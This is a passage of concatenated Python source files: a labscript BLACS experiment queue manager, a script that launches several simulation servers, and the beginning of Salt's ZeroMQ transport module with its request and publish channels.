self.action_repeat_last.triggered.connect(lambda *args: setattr(self, 'manager_repeat_mode', self.REPEAT_LAST))
self.repeat_mode_menu.addAction(self.action_repeat_all)
self.repeat_mode_menu.addAction(self.action_repeat_last)
self._ui.repeat_mode_select_button.setMenu(self.repeat_mode_menu)
# The button already has an arrow indicating a menu, don't draw another one:
self._ui.repeat_mode_select_button.setStyleSheet("QToolButton::menu-indicator{width: 0;}")
self.manager = threading.Thread(target = self.manage)
self.manager.daemon=True
self.manager.start()
self._callbacks = None
def _create_headers(self):
self._model.setHorizontalHeaderItem(FILEPATH_COLUMN, QStandardItem('Filepath'))
def get_save_data(self):
# get list of files in the queue
file_list = []
for i in range(self._model.rowCount()):
file_list.append(self._model.item(i).text())
# get button states
return {'manager_paused':self.manager_paused,
'manager_repeat':self.manager_repeat,
'manager_repeat_mode':self.manager_repeat_mode,
'files_queued':file_list,
'last_opened_shots_folder': self.last_opened_shots_folder
}
def restore_save_data(self,data):
if 'manager_paused' in data:
self.manager_paused = data['manager_paused']
if 'manager_repeat' in data:
self.manager_repeat = data['manager_repeat']
if 'manager_repeat_mode' in data:
self.manager_repeat_mode = data['manager_repeat_mode']
if 'files_queued' in data:
file_list = list(data['files_queued'])
self._model.clear()
self._create_headers()
for file in file_list:
self.process_request(str(file))
if 'last_opened_shots_folder' in data:
self.last_opened_shots_folder = data['last_opened_shots_folder']
@property
@inmain_decorator(True)
def manager_running(self):
return self._manager_running
@manager_running.setter
@inmain_decorator(True)
def manager_running(self,value):
value = bool(value)
self._manager_running = value
def _toggle_pause(self,checked):
self.manager_paused = checked
def _toggle_clear(self):
self._model.clear()
self._create_headers()
@property
@inmain_decorator(True)
def manager_paused(self):
return self._manager_paused
@manager_paused.setter
@inmain_decorator(True)
def manager_paused(self,value):
value = bool(value)
self._manager_paused = value
if value != self._ui.queue_pause_button.isChecked():
self._ui.queue_pause_button.setChecked(value)
def _toggle_repeat(self,checked):
self.manager_repeat = checked
@property
@inmain_decorator(True)
def manager_repeat(self):
return self._manager_repeat
@manager_repeat.setter
@inmain_decorator(True)
def manager_repeat(self,value):
value = bool(value)
self._manager_repeat = value
if value != self._ui.queue_repeat_button.isChecked():
self._ui.queue_repeat_button.setChecked(value)
@property
@inmain_decorator(True)
def manager_repeat_mode(self):
return self._manager_repeat_mode
@manager_repeat_mode.setter
@inmain_decorator(True)
def manager_repeat_mode(self, value):
assert value in [self.REPEAT_LAST, self.REPEAT_ALL]
self._manager_repeat_mode = value
button = self._ui.queue_repeat_button
if value == self.REPEAT_ALL:
button.setIcon(QIcon(self.ICON_REPEAT))
elif value == self.REPEAT_LAST:
button.setIcon(QIcon(self.ICON_REPEAT_LAST))
@inmain_decorator(True)
def get_callbacks(self, name, update_cache=False):
if update_cache or self._callbacks is None:
self._callbacks = {}
try:
for plugin in self.BLACS.plugins.values():
callbacks = plugin.get_callbacks()
if isinstance(callbacks, dict):
for callback_name, callback in callbacks.items():
if callback_name not in self._callbacks:
self._callbacks[callback_name] = []
self._callbacks[callback_name].append(callback)
except Exception as e:
self._logger.exception('A Error occurred during get_callbacks.')
if name in self._callbacks:
return self._callbacks[name]
else:
return []
def on_add_shots_triggered(self):
shot_files = QFileDialog.getOpenFileNames(self._ui, 'Select shot files',
self.last_opened_shots_folder,
"HDF5 files (*.h5)")
if isinstance(shot_files, tuple):
shot_files, _ = shot_files
if not shot_files:
# User cancelled selection
return
# Convert to standard platform specific path, otherwise Qt likes forward slashes:
shot_files = [os.path.abspath(str(shot_file)) for shot_file in shot_files]
# Save the containing folder for use next time we open the dialog box:
self.last_opened_shots_folder = os.path.dirname(shot_files[0])
# Queue the files to be opened:
for filepath in shot_files:
if filepath.endswith('.h5'):
self.process_request(str(filepath))
def _delete_selected_items(self):
index_list = self._ui.treeview.selectedIndexes()
while index_list:
self._model.takeRow(index_list[0].row())
index_list = self._ui.treeview.selectedIndexes()
def _move_up(self):
# Get the selection model from the treeview
selection_model = self._ui.treeview.selectionModel()
# Create a list of select row indices
selected_row_list = [index.row() for index in sorted(selection_model.selectedRows())]
# For each row selected
for i,row in enumerate(selected_row_list):
# only move the row if it is not element 0, and the row above it is not selected
# (note that while a row above may have been initially selected, it should by now, be one row higher
# since we start moving elements of the list upwards starting from the lowest index)
if row > 0 and (row-1) not in selected_row_list:
# Remove the selected row
items = self._model.takeRow(row)
# Add the selected row into a position one above
self._model.insertRow(row-1,items)
# Since it is now a newly inserted row, select it again
selection_model.select(self._model.indexFromItem(items[0]),QItemSelectionModel.SelectCurrent)
# reupdate the list of selected indices to reflect this change
selected_row_list[i] -= 1
def _move_down(self):
# Get the selection model from the treeview
selection_model = self._ui.treeview.selectionModel()
# Create a list of select row indices
selected_row_list = [index.row() for index in reversed(sorted(selection_model.selectedRows()))]
# For each row selected
for i,row in enumerate(selected_row_list):
# only move the row if it is not the last element, and the row above it is not selected
# (note that while a row below may have been initially selected, it should by now, be one row lower
# since we start moving elements of the list upwards starting from the highest index)
if row < self._model.rowCount()-1 and (row+1) not in selected_row_list:
# Remove the selected row
items = self._model.takeRow(row)
# Add the selected row into a position one above
self._model.insertRow(row+1,items)
# Since it is now a newly inserted row, select it again
selection_model.select(self._model.indexFromItem(items[0]),QItemSelectionModel.SelectCurrent)
# reupdate the list of selected indices to reflect this change
selected_row_list[i] += 1
def _move_top(self):
# Get the selection model from the treeview
selection_model = self._ui.treeview.selectionModel()
# Create a list of select row indices
selected_row_list = [index.row() for index in sorted(selection_model.selectedRows())]
# For each row selected
for i,row in enumerate(selected_row_list):
# only move the row while it is not element 0, and the row above it is not selected
# (note that while a row above may have been initially selected, it should by now, be one row higher
# since we start moving elements of the list upwards starting from the lowest index)
while row > 0 and (row-1) not in selected_row_list:
# Remove the selected row
items = self._model.takeRow(row)
# Add the selected row into a position one above
self._model.insertRow(row-1,items)
# Since it is now a newly inserted row, select it again
selection_model.select(self._model.indexFromItem(items[0]),QItemSelectionModel.SelectCurrent)
# reupdate the list of selected indices to reflect this change
selected_row_list[i] -= 1
row -= 1
def _move_bottom(self):
selection_model = self._ui.treeview.selectionModel()
# Create a list of select row indices
selected_row_list = [index.row() for index in reversed(sorted(selection_model.selectedRows()))]
# For each row selected
for i,row in enumerate(selected_row_list):
# only move the row while it is not the last element, and the row above it is not selected
# (note that while a row below may have been initially selected, it should by now, be one row lower
# since we start moving elements of the list upwards starting from the highest index)
while row < self._model.rowCount()-1 and (row+1) not in selected_row_list:
# Remove the selected row
items = self._model.takeRow(row)
# Add the selected row into a position one above
self._model.insertRow(row+1,items)
# Since it is now a newly inserted row, select it again
selection_model.select(self._model.indexFromItem(items[0]),QItemSelectionModel.SelectCurrent)
# reupdate the list of selected indices to reflect this change
selected_row_list[i] += 1
row += 1
@inmain_decorator(True)
def append(self, h5files):
for file in h5files:
item = QStandardItem(file)
item.setToolTip(file)
self._model.appendRow(item)
@inmain_decorator(True)
def prepend(self,h5file):
if not self.is_in_queue(h5file):
self._model.insertRow(0,QStandardItem(h5file))
def process_request(self,h5_filepath):
# check connection table
try:
new_conn = ConnectionTable(h5_filepath)
except:
return "H5 file not accessible to Control PC\n"
result,error = inmain(self.BLACS.connection_table.compare_to,new_conn)
if result:
# Has this run file been run already?
with h5py.File(h5_filepath) as h5_file:
if 'data' in h5_file['/']:
rerun = True
else:
rerun = False
if rerun or self.is_in_queue(h5_filepath):
self._logger.debug('Run file has already been run! Creating a fresh copy to rerun')
new_h5_filepath, repeat_number = self.new_rep_name(h5_filepath)
# Keep counting up until we get a filename that isn't in the filesystem:
while os.path.exists(new_h5_filepath):
new_h5_filepath, repeat_number = self.new_rep_name(new_h5_filepath)
success = self.clean_h5_file(h5_filepath, new_h5_filepath, repeat_number=repeat_number)
if not success:
return 'Cannot create a re run of this experiment. Is it a valid run file?'
self.append([new_h5_filepath])
message = "Experiment added successfully: experiment to be re-run\n"
else:
self.append([h5_filepath])
message = "Experiment added successfully\n"
if self.manager_paused:
message += "Warning: Queue is currently paused\n"
if not self.manager_running:
message = "Error: Queue is not running\n"
return message
else:
# TODO: Parse and display the contents of "error" in a more human readable format for analysis of what is wrong!
message = ("Connection table of your file is not a subset of the experimental control apparatus.\n"
"You may have:\n"
" Submitted your file to the wrong control PC\n"
" Added new channels to your h5 file, without rewiring the experiment and updating the control PC\n"
" Renamed a channel at the top of your script\n"
" Submitted an old file, and the experiment has since been rewired\n"
"\n"
"Please verify your experiment script matches the current experiment configuration, and try again\n"
"The error was %s\n"%error)
return message
def new_rep_name(self, h5_filepath):
basename = os.path.basename(h5_filepath).split('.h5')[0]
if '_rep' in basename:
reps = int(basename.split('_rep')[1])
return h5_filepath.split('_rep')[-2] + '_rep%05d.h5' % (reps + 1), reps + 1
return h5_filepath.split('.h5')[0] + '_rep%05d.h5' % 1, 1
def clean_h5_file(self, h5file, new_h5_file, repeat_number=0):
try:
with h5py.File(h5file,'r') as old_file:
with h5py.File(new_h5_file,'w') as new_file:
groups_to_copy = ['devices', 'calibrations', 'script', 'globals', 'connection table',
'labscriptlib', 'waits']
for group in groups_to_copy:
if group in old_file:
new_file.copy(old_file[group], group)
for name in old_file.attrs:
new_file.attrs[name] = old_file.attrs[name]
new_file.attrs['run repeat'] = repeat_number
except Exception as e:
#raise
self._logger.exception('Clean H5 File Error.')
return False
return True
@inmain_decorator(wait_for_return=True)
def is_in_queue(self,path):
item = self._model.findItems(path,column=FILEPATH_COLUMN)
if item:
return True
else:
return False
@inmain_decorator(wait_for_return=True)
def set_status(self, queue_status, shot_filepath=None):
self._ui.queue_status.setText(str(queue_status))
if shot_filepath is not None:
self._ui.running_shot_name.setText('<b>%s</b>'% str(os.path.basename(shot_filepath)))
else:
self._ui.running_shot_name.setText('')
@inmain_decorator(wait_for_return=True)
def get_status(self):
return self._ui.queue_status.text()
@inmain_decorator(wait_for_return=True)
def get_next_file(self):
return str(self._model.takeRow(0)[0].text())
@inmain_decorator(wait_for_return=True)
def transition_device_to_buffered(self, name, transition_list, h5file, restart_receiver):
tab = self.BLACS.tablist[name]
if self.get_device_error_state(name,self.BLACS.tablist):
return False
tab.connect_restart_receiver(restart_receiver)
tab.transition_to_buffered(h5file,self.current_queue)
transition_list[name] = tab
return True
@inmain_decorator(wait_for_return=True)
def get_device_error_state(self,name,device_list):
return device_list[name].error_message
def manage(self):
logger = logging.getLogger('BLACS.queue_manager.thread')
# While the program is running!
logger.info('starting')
# HDF5 prints lots of errors by default, for things that aren't
# actually errors. These are silenced on a per thread basis,
# and automatically silenced in the main thread when h5py is
# imported. So we'll silence them in this thread too:
h5py._errors.silence_errors()
# This name stores the queue currently being used to
# communicate with tabs, so that abort signals can be put
# to it when those tabs never respond and are restarted by
# the user.
self.current_queue = Queue.Queue()
#TODO: put in general configuration
timeout_limit = 300 #seconds
self.set_status("Idle")
while self.manager_running:
# If the pause button is pushed in, sleep
if self.manager_paused:
if self.get_status() == "Idle":
logger.info('Paused')
self.set_status("Queue paused")
time.sleep(1)
continue
# Get the top file
try:
path = self.get_next_file()
self.set_status('Preparing shot...', path)
logger.info('Got a file: %s'%path)
except:
# If no files, sleep for 1s,
self.set_status("Idle")
time.sleep(1)
continue
devices_in_use = {}
transition_list = {}
start_time = time.time()
self.current_queue = Queue.Queue()
# Function to be run when abort button is clicked
def abort_function():
try:
# Set device name to "Queue Manager" which will never be a labscript device name
# as it is not a valid python variable name (has a space in it!)
self.current_queue.put(['Queue Manager', 'abort'])
except Exception:
logger.exception('Could not send abort message to the queue manager')
def restart_function(device_name):
try:
self.current_queue.put([device_name, 'restart'])
except Exception:
logger.exception('Could not send restart message to the queue manager for device %s'%device_name)
##########################################################################################################################################
# transition to buffered #
##########################################################################################################################################
try:
# A Queue for event-based notification when the tabs have
# completed transitioning to buffered:
timed_out = False
error_condition = False
abort = False
restarted = False
self.set_status("Transitioning to buffered...", path)
# Enable abort button, and link in current_queue:
inmain(self._ui.queue_abort_button.clicked.connect,abort_function)
inmain(self._ui.queue_abort_button.setEnabled,True)
with h5py.File(path,'r') as hdf5_file:
h5_file_devices = hdf5_file['devices/'].keys()
for name in h5_file_devices:
try:
# Connect restart signal from tabs to current_queue and transition the device to buffered mode
success = self.transition_device_to_buffered(name,transition_list,path,restart_function)
if not success:
logger.error('%s has an error condition, aborting run' % name)
error_condition = True
break
except Exception as e:
logger.exception('Exception while transitioning %s to buffered mode.'%(name))
error_condition = True
break
devices_in_use = transition_list.copy()
while transition_list and not error_condition:
try:
# Wait for a device to transtition_to_buffered:
logger.debug('Waiting for the following devices to finish transitioning to buffered mode: %s'%str(transition_list))
device_name, result = self.current_queue.get(timeout=2)
#Handle abort button signal
if device_name == 'Queue Manager' and result == 'abort':
# we should abort the run
logger.info('abort signal received from GUI')
abort = True
break
if result == 'fail':
logger.info('abort signal received during transition to buffered of %s' % device_name)
error_condition = True
break
elif result == 'restart':
logger.info('Device %s was restarted, aborting shot.'%device_name)
restarted = True
break
logger.debug('%s finished transitioning to buffered mode' % device_name)
# The tab says it's done, but does it have an error condition?
if self.get_device_error_state(device_name,transition_list):
logger.error('%s has an error condition, aborting run' % device_name)
error_condition = True
break
del transition_list[device_name]
except Queue.Empty:
# It's been 2 seconds without a device finishing
# transitioning to buffered. Is there an error?
for name in transition_list:
if self.get_device_error_state(name,transition_list):
error_condition = True
break
if error_condition:
break
# Has programming timed out?
if time.time() - start_time > timeout_limit:
logger.error('Transitioning to buffered mode timed out')
timed_out = True
break
# Handle if we broke out of loop due to timeout or error:
if timed_out or error_condition or abort or restarted:
# Pause the queue, re add the path to the top of the queue, and set a status message!
# only if we aren't responding to an abort click
if not abort:
self.manager_paused = True
self.prepend(path)
if timed_out:
self.set_status("Programming timed out\nQueue paused")
elif abort:
self.set_status("Aborted")
elif restarted:
self.set_status("Device restarted in transition to\nbuffered. Aborted. Queue paused.")
else:
self.set_status("Device(s) in error state\nQueue Paused")
# Abort the run for all devices in use:
# need to recreate the queue here because we don't want to hear from devices that are still transitioning to buffered mode
self.current_queue = Queue.Queue()
for tab in devices_in_use.values():
# We call abort buffered here, because if each tab is either in mode=BUFFERED or transition_to_buffered failed in which case
# it should have called abort_transition_to_buffered itself and returned to manual mode
# Since abort buffered will only run in mode=BUFFERED, and the state is not queued indefinitely (aka it is deleted if we are not in mode=BUFFERED)
# this is the correct method call to make for either case
tab.abort_buffered(self.current_queue)
# We don't need to check the results of this function call because it will either be successful, or raise a visible error in the tab.
# disconnect restart signal from tabs
inmain(tab.disconnect_restart_receiver,restart_function)
# disconnect abort button and disable
inmain(self._ui.queue_abort_button.clicked.disconnect,abort_function)
inmain(self._ui.queue_abort_button.setEnabled,False)
# Start a new iteration
continue
##########################################################################################################################################
# SCIENCE! #
##########################################################################################################################################
# Get front panel data, but don't save it to the h5 file until the experiment ends:
states,tab_positions,window_data,plugin_data = self.BLACS.front_panel_settings.get_save_data()
self.set_status("Running (program time: %.3fs)..."%(time.time() - start_time), path)
# A Queue for event-based notification of when the experiment has finished.
experiment_finished_queue = Queue.Queue()
logger.debug('About to start the master pseudoclock')
run_time = time.localtime()
#TODO: fix potential race condition if BLACS is closing when this line executes?
self.BLACS.tablist[self.master_pseudoclock].start_run(experiment_finished_queue)
# Wait for notification of the end of run:
abort = False
restarted = False
done = False
while not (abort or restarted or done):
try:
done = experiment_finished_queue.get(timeout=0.5) == 'done'
except Queue.Empty:
pass
try:
# Poll self.current_queue for abort signal from button or device restart
device_name, result = self.current_queue.get_nowait()
if (device_name == 'Queue Manager' and result == 'abort'):
abort = True
if result == 'restart':
restarted = True
# Check for error states in tabs
for device_name, tab in devices_in_use.items():
if self.get_device_error_state(device_name,devices_in_use):
restarted = True
except Queue.Empty:
pass
if abort or restarted:
for devicename, tab in devices_in_use.items():
if tab.mode == MODE_BUFFERED:
tab.abort_buffered(self.current_queue)
# disconnect restart signal from tabs
inmain(tab.disconnect_restart_receiver,restart_function)
# Disable abort button
inmain(self._ui.queue_abort_button.clicked.disconnect,abort_function)
inmain(self._ui.queue_abort_button.setEnabled,False)
if restarted:
self.manager_paused = True
self.prepend(path)
self.set_status("Device restarted during run.\nAborted. Queue paused")
elif abort:
self.set_status("Aborted")
if abort or restarted:
# after disabling the abort button, we now start a new iteration
continue
logger.info('Run complete')
self.set_status("Saving data...", path)
# End try/except block here
except Exception:
logger.exception("Error in queue manager execution. Queue paused.")
# Raise the error in a thread for visibility
zprocess.raise_exception_in_thread(sys.exc_info())
# clean up the h5 file
self.manager_paused = True
# is this a repeat?
try:
with h5py.File(path, 'r') as h5_file:
repeat_number = h5_file.attrs.get('run repeat', 0)
except:
repeat_numer = 0
# clean the h5 file:
self.clean_h5_file(path, 'temp.h5', repeat_number=repeat_number)
try:
os.remove(path)
os.rename('temp.h5', path)
except WindowsError if platform.system() == 'Windows' else None:
logger.warning('Couldn\'t delete failed run file %s, another process may be using it. Using alternate filename for second attempt.'%path)
os.rename('temp.h5', path.replace('.h5','_retry.h5'))
path = path.replace('.h5','_retry.h5')
# Put it back at the start of the queue:
self.prepend(path)
# Need to put devices back in manual mode
self.current_queue = Queue.Queue()
for devicename, tab in devices_in_use.items():
if tab.mode == MODE_BUFFERED or tab.mode == MODE_TRANSITION_TO_BUFFERED:
tab.abort_buffered(self.current_queue)
# disconnect restart signal from tabs
inmain(tab.disconnect_restart_receiver,restart_function)
self.set_status("Error in queue manager\nQueue paused")
# disconnect and disable abort button
inmain(self._ui.queue_abort_button.clicked.disconnect,abort_function)
inmain(self._ui.queue_abort_button.setEnabled,False)
# Start a new iteration
continue
##########################################################################################################################################
# SCIENCE OVER! #
##########################################################################################################################################
##########################################################################################################################################
# Transition to manual #
##########################################################################################################################################
# start new try/except block here
try:
with h5py.File(path,'r+') as hdf5_file:
self.BLACS.front_panel_settings.store_front_panel_in_h5(hdf5_file,states,tab_positions,window_data,plugin_data,save_conn_table = False)
with h5py.File(path,'r+') as hdf5_file:
data_group = hdf5_file['/'].create_group('data')
# stamp with the run time of the experiment
hdf5_file.attrs['run time'] = time.strftime('%Y%m%dT%H%M%S',run_time)
# A Queue for event-based notification of when the devices have transitioned to static mode:
# Shouldn't need to recreate the queue: self.current_queue = Queue.Queue()
# TODO: unserialise this if everything is using zprocess.locking
# only transition one device to static at a time,
# since writing data to the h5 file can potentially
# happen at this stage:
error_condition = False
# This is far more complicated than it needs to be once transition_to_manual is unserialised!
response_list = {}
for device_name, tab in devices_in_use.items():
if device_name not in response_list:
tab.transition_to_manual(self.current_queue)
while True:
# TODO: make the call to current_queue.get() timeout
# and periodically check for error condition on the tab
got_device_name, result = self.current_queue.get()
# if the response is not for this device, then save it for later!
if device_name != got_device_name:
response_list[got_device_name] = result
else:
break
else:
result = response_list[device_name]
# Check for abort signal from device restart
if result == 'fail':
error_condition = True
if result == 'restart':
error_condition = True
if self.get_device_error_state(device_name,devices_in_use):
error_condition = True
# Once device has transitioned_to_manual, disconnect restart signal
inmain(tab.disconnect_restart_receiver,restart_function)
if error_condition:
self.set_status("Error in transtion to manual\nQueue Paused")
except Exception as e:
error_condition = True
logger.exception("Error in queue manager execution. Queue paused.")
self.set_status("Error in queue manager\nQueue paused")
# Raise the error in a thread for visibility
zprocess.raise_exception_in_thread(sys.exc_info())
if error_condition:
# clean up the h5 file
self.manager_paused = True
# is this a repeat?
try:
with h5py.File(path, 'r') as h5_file:
repeat_number = h5_file.attrs.get('run repeat', 0)
except:
repeat_number = 0
# clean the h5 file:
self.clean_h5_file(path, 'temp.h5', repeat_number=repeat_number)
try:
os.remove(path)
os.rename('temp.h5', path)
except WindowsError if platform.system() == 'Windows' else None:
logger.warning('Couldn\'t delete failed run file %s, another process may be using it. Using alternate filename for second attempt.'%path)
os.rename('temp.h5', path.replace('.h5','_retry.h5'))
path = path.replace('.h5','_retry.h5')
# Put it back at the start of the queue:
self.prepend(path)
# Need to put devices back in manual mode. Since the experiment is over before this try/except block begins, we can
# safely call transition_to_manual() on each device tab
# TODO: Not serialised...could be bad with older BIAS versions :(
self.current_queue = Queue.Queue()
for devicename, tab in devices_in_use.items():
if tab.mode == MODE_BUFFERED:
tab.transition_to_manual(self.current_queue)
# disconnect restart signal from tabs
inmain(tab.disconnect_restart_receiver,restart_function)
continue
##########################################################################################################################################
# Analysis Submission #
##########################################################################################################################################
logger.info('All devices are back in static mode.')
# check for analysis Filters in Plugins
send_to_analysis = True
for callback in self.get_callbacks('analysis_cancel_send'):
try:
if callback(path) is True:
send_to_analysis = False
break
except Exception:
logger.exception("Plugin callback raised an exception")
# Submit to the analysis server
if send_to_analysis:
self.BLACS.analysis_submission.get_queue().put(['file', path])
##########################################################################################################################################
# Repeat Experiment? #
##########################################################################################################################################
if self.manager_repeat:
if ((self.manager_repeat_mode == self.REPEAT_ALL) or
(self.manager_repeat_mode == self.REPEAT_LAST and inmain(self._model.rowCount) == 0)):
# Resubmit job to the bottom of the queue:
try:
message = self.process_request(path)
except Exception:
# TODO: make this error popup for the user
self.logger.exception('Failed to copy h5_file (%s) for repeat run'%s)
logger.info(message)
self.set_status("Idle")
logger.info('Stopping')
|
launch_servers.py
|
from multiprocessing import Process
import time
import argparse
import socket
import os
from utils import check_ports_avail
ap = argparse.ArgumentParser()
ap.add_argument("-n", "--number-servers", required=True, help="number of servers to spawn", type=int)
ap.add_argument("-p", "--ports-start", required=True, help="the start of the range of ports to use", type=int)
ap.add_argument("-t", "--host", default="None", help="the host; default is local host; string either internet domain or IPv4", type=str)
args = vars(ap.parse_args())
number_servers = args["number_servers"]
ports_start = args["ports_start"]
host = args["host"]
if host == 'None':
host = socket.gethostname()
list_ports = [ind_server + ports_start for ind_server in range(number_servers)]
print("To be used ports:{}".format(list_ports));
# check for the availability of the ports
if not check_ports_avail(host, list_ports):
quit()
# make copies of the code to avoid collisions
for rank in range(number_servers):
print("copy files for env of rank {}".format(rank))
# the necessary files and folders
list_to_copy = ['environment.py',
'fenics_solver.py',
'generate_shape.py',
'meshes_utils.py',
'shapes_utils.py',
'parametered_env.py',
'start_one_server.py',
'RemoteEnvironmentClient.py',
'RemoteEnvironmentServer.py',
'echo_server.py',
'reset']
# make the env folder and copy all the necessary files
if not os.path.exists('env_' + str(rank)):
os.system('mkdir ' + 'env_' + str(rank) + '/')
for crrt_to_copy in list_to_copy:
os.system('cp -r ' + crrt_to_copy + ' env_' + str(rank) + '/.')
def launch_one_server(rank, host, port):
os.system('cd env_{} && python3 start_one_server.py -t {} -p {}'.format(rank, host, port))
processes = []
# launch all the servers one after the other
if __name__ == '__main__':
for rank, port in enumerate(list_ports):
print("launching process of rank {}".format(rank))
proc = Process(target=launch_one_server, args=(rank, host, port))
proc.start()
processes.append(proc)
time.sleep(2.0) # just to avoid collisions in the terminal printing
print("all processes started, ready to serve...")
for proc in processes:
proc.join()
|
zeromq.py
|
# -*- coding: utf-8 -*-
'''
Zeromq transport classes
'''
# Import Python Libs
from __future__ import absolute_import
import logging
import os
import errno
import hashlib
import weakref
from random import randint
# Import Salt Libs
import salt.auth
import salt.crypt
import salt.utils
import salt.utils.verify
import salt.utils.event
import salt.payload
import salt.transport.client
import salt.transport.server
import salt.transport.mixins.auth
from salt.exceptions import SaltReqTimeoutError
import zmq
import zmq.eventloop.ioloop
# support pyzmq 13.0.x, TODO: remove once we force people to 14.0.x
if not hasattr(zmq.eventloop.ioloop, 'ZMQIOLoop'):
zmq.eventloop.ioloop.ZMQIOLoop = zmq.eventloop.ioloop.IOLoop
import zmq.eventloop.zmqstream
try:
import zmq.utils.monitor
HAS_ZMQ_MONITOR = True
except ImportError:
HAS_ZMQ_MONITOR = False
# Import Tornado Libs
import tornado
import tornado.gen
import tornado.concurrent
# Import third party libs
import salt.ext.six as six
from Crypto.Cipher import PKCS1_OAEP
log = logging.getLogger(__name__)
class AsyncZeroMQReqChannel(salt.transport.client.ReqChannel):
'''
Encapsulate sending routines to ZeroMQ.
ZMQ Channels default to 'crypt=aes'
'''
# This class is only a singleton per minion/master pair
# mapping of io_loop -> {key -> channel}
instance_map = weakref.WeakKeyDictionary()
def __new__(cls, opts, **kwargs):
'''
Only create one instance of channel per __key()
'''
# do we have any mapping for this io_loop
io_loop = kwargs.get('io_loop')
if io_loop is None:
zmq.eventloop.ioloop.install()
io_loop = tornado.ioloop.IOLoop.current()
if io_loop not in cls.instance_map:
cls.instance_map[io_loop] = weakref.WeakValueDictionary()
loop_instance_map = cls.instance_map[io_loop]
key = cls.__key(opts, **kwargs)
if key not in loop_instance_map:
log.debug('Initializing new AsyncZeroMQReqChannel for {0}'.format(key))
# we need to make a local variable for this, as we are going to store
# it in a WeakValueDictionary-- which will remove the item if no one
# references it-- this forces a reference while we return to the caller
new_obj = object.__new__(cls)
new_obj.__singleton_init__(opts, **kwargs)
loop_instance_map[key] = new_obj
else:
log.debug('Re-using AsyncZeroMQReqChannel for {0}'.format(key))
try:
return loop_instance_map[key]
except KeyError:
# In iterating over the loop_instance_map, we may have triggered
# garbage collection. Therefore, the key is no longer present in
# the map. Re-gen and add to map.
log.debug('Initializing new AsyncZeroMQReqChannel due to GC for {0}'.format(key))
new_obj = object.__new__(cls)
new_obj.__singleton_init__(opts, **kwargs)
loop_instance_map[key] = new_obj
return loop_instance_map[key]
@classmethod
def __key(cls, opts, **kwargs):
return (opts['pki_dir'], # where the keys are stored
opts['id'], # minion ID
kwargs.get('master_uri', opts.get('master_uri')), # master ID
kwargs.get('crypt', 'aes'), # TODO: use the same channel for crypt
)
# has to remain empty for singletons, since __init__ will *always* be called
def __init__(self, opts, **kwargs):
pass
# an init for the singleton instance to call
def __singleton_init__(self, opts, **kwargs):
self.opts = dict(opts)
self.ttype = 'zeromq'
# crypt defaults to 'aes'
self.crypt = kwargs.get('crypt', 'aes')
if 'master_uri' in kwargs:
self.opts['master_uri'] = kwargs['master_uri']
self._io_loop = kwargs.get('io_loop')
if self._io_loop is None:
zmq.eventloop.ioloop.install()
self._io_loop = tornado.ioloop.IOLoop.current()
if self.crypt != 'clear':
# we don't need to worry about auth as a kwarg, since its a singleton
self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self._io_loop)
self.message_client = AsyncReqMessageClient(self.opts,
self.master_uri,
io_loop=self._io_loop,
)
def __del__(self):
'''
Since the message_client creates sockets and assigns them to the IOLoop we have to
specifically destroy them, since we aren't the only ones with references to the FDs
'''
if hasattr(self, 'message_client'):
self.message_client.destroy()
else:
log.debug('No message_client attr for AsyncZeroMQReqChannel found. Not destroying sockets.')
@property
def master_uri(self):
return self.opts['master_uri']
def _package_load(self, load):
return {
'enc': self.crypt,
'load': load,
}
@tornado.gen.coroutine
def crypted_transfer_decode_dictentry(self, load, dictkey=None, tries=3, timeout=60):
if not self.auth.authenticated:
# Return controle back to the caller, continue when authentication succeeds
yield self.auth.authenticate()
# Return control to the caller. When send() completes, resume by populating ret with the Future.result
ret = yield self.message_client.send(self._package_load(self.auth.crypticle.dumps(load)), timeout=timeout)
key = self.auth.get_keys()
cipher = PKCS1_OAEP.new(key)
aes = cipher.decrypt(ret['key'])
pcrypt = salt.crypt.Crypticle(self.opts, aes)
raise tornado.gen.Return(pcrypt.loads(ret[dictkey]))
@tornado.gen.coroutine
def _crypted_transfer(self, load, tries=3, timeout=60):
'''
Send a load across the wire, with encryption
In case of authentication errors, try to renegotiate authentication
and retry the method.
Indeed, we can fail too early in case of a master restart during a
minion state execution call
:param dict load: A load to send across the wire
:param int tries: The number of times to make before failure
:param int timeout: The number of seconds on a response before failing
'''
@tornado.gen.coroutine
def _do_transfer():
# Yield control to the caller. When send() completes, resume by populating data with the Future.result
data = yield self.message_client.send(self._package_load(self.auth.crypticle.dumps(load)),
timeout=timeout,
)
# we may not have always data
# as for example for saltcall ret submission, this is a blind
# communication, we do not subscribe to return events, we just
# upload the results to the master
if data:
data = self.auth.crypticle.loads(data)
raise tornado.gen.Return(data)
if not self.auth.authenticated:
# Return control back to the caller, resume when authentication succeeds
yield self.auth.authenticate()
try:
# We did not get data back the first time. Retry.
ret = yield _do_transfer()
except salt.crypt.AuthenticationError:
# If auth error, return control back to the caller, continue when authentication succeeds
yield self.auth.authenticate()
ret = yield _do_transfer()
raise tornado.gen.Return(ret)
@tornado.gen.coroutine
def _uncrypted_transfer(self, load, tries=3, timeout=60):
'''
Send a load across the wire in cleartext
:param dict load: A load to send across the wire
:param int tries: The number of times to make before failure
:param int timeout: The number of seconds on a response before failing
'''
ret = yield self.message_client.send(self._package_load(load), timeout=timeout)
raise tornado.gen.Return(ret)
@tornado.gen.coroutine
def send(self, load, tries=3, timeout=60):
'''
Send a request, return a future which will complete when we send the message
'''
if self.crypt == 'clear':
ret = yield self._uncrypted_transfer(load, tries=tries, timeout=timeout)
else:
ret = yield self._crypted_transfer(load, tries=tries, timeout=timeout)
raise tornado.gen.Return(ret)
class AsyncZeroMQPubChannel(salt.transport.mixins.auth.AESPubClientMixin, salt.transport.client.AsyncPubChannel):
'''
A transport channel backed by ZeroMQ for a Salt Publisher to use to
publish commands to connected minions
'''
def __init__(self,
opts,
**kwargs):
self.opts = opts
self.ttype = 'zeromq'
self.io_loop = kwargs.get('io_loop')
if self.io_loop is None:
zmq.eventloop.ioloop.install()
self.io_loop = tornado.ioloop.IOLoop.current()
self.hexid = hashlib.sha1(six.b(self.opts['id'])).hexdigest()
self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self.io_loop)
self.serial = salt.payload.Serial(self.opts)
self.context = zmq.Context()
self._socket = self.context.socket(zmq.SUB)
if self.opts['zmq_filtering']:
# TODO: constants file for "broadcast"
self._socket.setsockopt(zmq.SUBSCRIBE, 'broadcast')
self._socket.setsockopt(zmq.SUBSCRIBE, self.hexid)
else:
self._socket.setsockopt(zmq.SUBSCRIBE, '')
self._socket.setsockopt(zmq.SUBSCRIBE, '')
